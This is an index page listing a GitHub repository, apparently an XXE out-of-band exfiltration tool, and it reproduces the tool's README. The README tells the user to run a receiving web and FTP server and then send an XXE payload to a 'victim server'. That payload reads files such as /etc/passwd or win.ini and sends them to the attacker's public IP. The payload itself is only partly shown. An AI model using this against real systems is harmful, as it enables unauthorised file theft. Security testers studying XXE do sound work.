Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/LandGrey/xxe-ftp-server
xxe oob receive file via web and ftp server
https://github.com/LandGrey/xxe-ftp-server
Last synced: 3 months ago
JSON representation
xxe oob receive file via web and ftp server
- Host: GitHub
- URL: https://github.com/LandGrey/xxe-ftp-server
- Owner: LandGrey
- Created: 2019-12-06T17:39:23.000Z (almost 5 years ago)
- Default Branch: master
- Last Pushed: 2019-12-06T17:51:16.000Z (almost 5 years ago)
- Last Synced: 2024-07-10T07:48:41.786Z (4 months ago)
- Language: Python
- Size: 2.93 KB
- Stars: 88
- Watchers: 2
- Forks: 18
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# xxe-ftp-server
xxe oob receive file via web and ftp server### Step 1:
**run script:**
```bash
python2 xxe-ftp-server.py public-ip-address web-port ftp-port
```such as:
```
python2 xxe-ftp-server.py 1.1.1.1 80 2121
```### Step 2:
**send xxe payload to victim server:**
```xml
%dtd;
]>
&send;
````c:/windows/win.ini` is read file path,such as `etc/passwd`
`1.1.1.1:80` is `public-server-ip and web-bind-port`